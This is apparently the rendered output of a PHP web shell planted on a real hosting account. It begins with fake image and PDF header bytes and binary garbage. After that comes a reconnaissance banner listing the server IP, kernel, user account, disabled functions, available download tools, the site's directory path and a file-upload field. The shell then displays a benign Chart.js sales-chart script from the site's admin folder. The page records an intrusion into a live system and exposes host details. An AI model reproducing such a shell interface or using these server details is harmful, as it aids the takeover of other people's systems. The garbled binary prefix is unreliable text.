ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/blogs/admin_css/js/ |
Upload File : |
$(function(e){ 'use strict' /* chartjs (#sales-status) */ var ctx = $('#sales-status'); ctx.height(285); var myChart = new Chart(ctx, { type: 'line', data: { labels: ["Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sep", "Oct", "Nov", "Dec"], type: 'line', datasets: [{ label: "Selling", data: [678, 723, 543, 834, 295, 935, 382, 756, 486, 386, 678, 780], backgroundColor: 'transparent', borderColor: '#ed5151', borderWidth: 3, pointStyle: 'circle', pointRadius: 5, pointBorderColor: 'transparent', pointBackgroundColor: '#ed5151', }, { label: "Buying", data: [250, 320, 260, 410, 690, 760, 380, 425, 630, 724, 586, 960], backgroundColor: 'transparent', borderColor: '#9c31df', borderWidth: 3, pointStyle: 'circle', pointRadius: 5, pointBorderColor: 'transparent', pointBackgroundColor: '#9c31df', }] }, options: { responsive: true, maintainAspectRatio: false, tooltips: { mode: 'index', titleFontSize: 12, titleFontColor: '#000', bodyFontColor: '#000', backgroundColor: '#fff', cornerRadius: 3, intersect: false, }, legend: { display: true, labels: { usePointStyle: false, }, }, scales: { xAxes: [{ ticks: { fontColor: "#070510", }, display: true, gridLines: { display: true, color:'rgba(96, 94, 126, 0.1)', drawBorder: false }, scaleLabel: { display: false, labelString: 'Month', fontColor: 'transparent' } }], yAxes: [{ ticks: { fontColor: "#070510", }, display: true, gridLines: { display: true, color:'rgba(96, 94, 126, 0.1)', drawBorder: false }, scaleLabel: { display: false, labelString: 'sales', fontColor: 'transparent' } }] }, title: { display: false, text: 'Normal Legend' } } }); /* chartjs (#sales-status) closed */ });